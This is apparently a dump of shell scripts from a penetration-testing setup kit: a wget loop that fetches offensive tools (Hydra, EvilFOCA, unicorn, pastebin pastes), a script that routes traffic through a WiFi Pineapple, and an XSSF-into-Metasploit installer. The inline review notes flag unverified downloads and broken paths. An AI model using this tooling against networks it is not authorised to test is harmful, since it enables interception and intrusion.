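http://www.thc.org/releases/hydra-8.1.tar.gz
https://code.google.com/p/littleblackbox/downloads/detail?name=littleblackbox-0.1.3.tar.gz
https://github.com/ElevenPaths/EvilFOCA/releases/download/0.1.4.0/EvilFoca.zip
https://bitbucket.org/grimhacker/gpppfinder/downloads
https://bitbucket.org/atlas0fd00m/rfcat/downloads/rfcat_150225.tgz
http://pastebin.com/raw/1pH95aep
http://pastebin.com/raw/8CepfW8p
https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip
https://labs.portcullis.co.uk/download/whoislikeaboss.tar.gz
https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2
https://github.com/trustedsec/unicorn/archive/2.3.zip
https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/gnucitizen/proxify-Linux.tar.gz
EOF`
# Download every URL in $a into the parent directory.
#
# --no-check-certificate has been dropped: with it, wget accepts any TLS
# certificate, so an https download can be swapped in transit without any
# warning. A host whose certificate no longer validates now fails and is
# reported below.
#
# NOTE(review): nothing here checks what was downloaded. Several entries are
# plain http or ftp, and many are executables or archives. Record a known-good
# SHA-256 for each file and compare it (sha256sum -c) before unpacking or
# running anything.
cd ../ || exit 1
# $a is split on whitespace on purpose; globbing is switched off for the loop
# so a URL containing '?' is never expanded against local file names.
set -f
for i in $a
do
  wget "$i" || echo "download failed: $i" 1>&2
done
set +f
# Presumably clears the ".1"/".2" copies wget creates when a file name already
# exists. This targets /opt while the downloads go to "..", so the two only
# line up when the script is run from a directory directly under /opt.
rm -f /opt/*.1 /opt/*.2
--------------------------------------------------------------------------------
/wp5.sh: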
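--------------------------------------------------------------------------------
#!/bin/bash
# wp5.sh - Internet connection sharing between this PC and a WiFi Pineapple.
#
# Prompts for the addressing details (Enter keeps the default shown in
# brackets), then configures the interface facing the Pineapple, enables IPv4
# forwarding, rewrites the iptables filter rules and replaces the default
# route.
#
# Caveats:
#   * Needs root: it writes /proc/sys/net/ipv4/ip_forward and changes
#     interfaces, firewall rules and routes.
#   * Every rule in the filter table is flushed and forwarding stays enabled
#     after the script ends; nothing is restored. Save the current rules first
#     (iptables-save) if the host depends on them.
#define variables

echo "$(tput setaf 3) _ ___ _______ ____ _ __ "
echo " | | / (_) ____(_) / __ \\(_)___ ___ ____ _____ ____ / /__ "
echo " | | /| / / / /_ / / / /_/ / / __ \/ _ \/ __ '/ __ \/ __ \/ / _ \\"
echo " | |/ |/ / / __/ / / / ____/ / / / / __/ /_/ / /_/ / /_/ / / __/"
echo " |__/|__/_/_/ /_/ /_/ /_/_/ /_/\___/\__,_/ .___/ .___/_/\___/ "
echo " $(tput sgr0) OWN the Network $(tput setaf 3)/_/ /_/$(tput sgr0) v2.2"
echo ""

# Fail before asking any questions rather than half-way through the changes.
if [[ $EUID -ne 0 ]]; then
  echo "wp5.sh must be run as root" 1>&2
  exit 1
fi

echo -n "Pineapple Netmask [255.255.255.0]: "
read -r pineapplenetmask
pineapplenetmask=${pineapplenetmask:-255.255.255.0} #Default netmask for /24 network

echo -n "Pineapple Network [172.16.42.0/24]: "
read -r pineapplenet
pineapplenet=${pineapplenet:-172.16.42.0/24} # Pineapple network. Default is 172.16.42.0/24

echo -n "Interface between PC and Pineapple [eth0]: "
read -r pineapplelan
pineapplelan=${pineapplelan:-eth0} # Interface of ethernet cable directly connected to Pineapple

echo -n "Interface between PC and Internet [wlan0]: "
read -r pineapplewan
pineapplewan=${pineapplewan:-wlan0} #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan

# Gateway of the first routing-table entry whose third column is 0.0.0.0.
# The earlier awk program looped on getline inside BEGIN and never finished
# when no such entry existed; this form stops at end of input.
temppineapplegw=$(netstat -nr | awk '$3 == "0.0.0.0" { print $2; exit }') #Usually correct by default
echo -n "Internet Gateway [$temppineapplegw]: "
read -r pineapplegw
pineapplegw=${pineapplegw:-$temppineapplegw}

echo -n "IP Address of Host PC [172.16.42.42]: "
read -r pineapplehostip
pineapplehostip=${pineapplehostip:-172.16.42.42} #IP Address of host computer

echo -n "IP Address of Pineapple [172.16.42.1]: "
read -r pineappleip
pineappleip=${pineappleip:-172.16.42.1} #Thanks Douglas Adams

# These answers become arguments to ifconfig, iptables and route running as
# root. Refuse anything empty, starting with '-' or containing whitespace, so
# an answer can never be read as an extra option or as several arguments. An
# empty gateway (no default route found and none typed in) also stops here,
# before the existing default route is removed.
for value in "$pineapplenetmask" "$pineapplenet" "$pineapplelan" "$pineapplewan" "$pineapplegw" "$pineapplehostip" "$pineappleip"; do
  case $value in
    '' | -* | *[[:space:]]*)
      echo "Invalid value: '$value'" 1>&2
      exit 1
      ;;
  esac
done

#Display settings
#echo Pineapple connected to: $pineapplelan
#echo Internet connection from: $pineapplewan
#echo Internet connection gateway: $pineapplegw
#echo Host Computer IP: $pineapplehostip
#echo Pineapple IP: $pineappleip
#echo Network: $pineapplenet
#echo Netmask: $pineapplenetmask

echo ""
echo "$(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)\||/$(tput sgr0) Internet: $pineapplegw - $pineapplewan"
echo "$(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3),<><>,$(tput sgr0) Computer: $pineapplehostip"
echo "$(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)'<><>'$(tput sgr0) Pineapple: $pineapplenet - $pineapplelan"


#Bring up Ethernet Interface directly connected to Pineapple
ifconfig "$pineapplelan" "$pineapplehostip" netmask "$pineapplenetmask" up

# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
#echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
#cat /proc/sys/net/ipv4/ip_forward

#clear chains and rules
# Flush before deleting: a user-defined chain can only be removed once it is
# empty and no rule refers to it.
iptables -F
iptables -X
#echo iptables chains and rules cleared

#setup IP forwarding
# NOTE(review): -i and -o look swapped for traffic that originates on the
# Pineapple network; forwarding still works while the FORWARD policy is
# ACCEPT. Confirm the intent before tightening that policy.
iptables -A FORWARD -i "$pineapplewan" -o "$pineapplelan" -s "$pineapplenet" -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
# NOTE(review): no -o here, so traffic leaving any interface is masqueraded,
# and the nat table is never flushed above, so each run appends one more copy
# of this rule.
iptables -A POSTROUTING -t nat -j MASQUERADE
#echo IP Forwarding Enabled

#remove default route
route del default
#echo Default route removed

#add default gateway
route add default gw "$pineapplegw" "$pineapplewan"
#echo Pineapple Default Gateway Configured

#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan

#ping -c1 $pineappleip
#if [ $? -eq 0 ]; then
#echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
#fi

echo ""
echo "Browse to http://$pineappleip:1471"
echo ""
--------------------------------------------------------------------------------
/xssf.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Update Metasploit, then export the XSSF trunk over the msf3 tree.
msfupdate
# Stop if the directory is missing: `svn export ... ./ --force` overwrites
# files in whatever directory it runs from.
cd /opt/metasploit/apps/pro/msf3 || exit 1
# NOTE(review): the host name looks truncated ("xssf.googlecode" has no
# top-level domain) and the export uses plain http, so the files written into
# the framework tree have no transport integrity. Confirm the source before
# relying on this.
svn export http://xssf.googlecode/svn/trunk ./ --force
--------------------------------------------------------------------------------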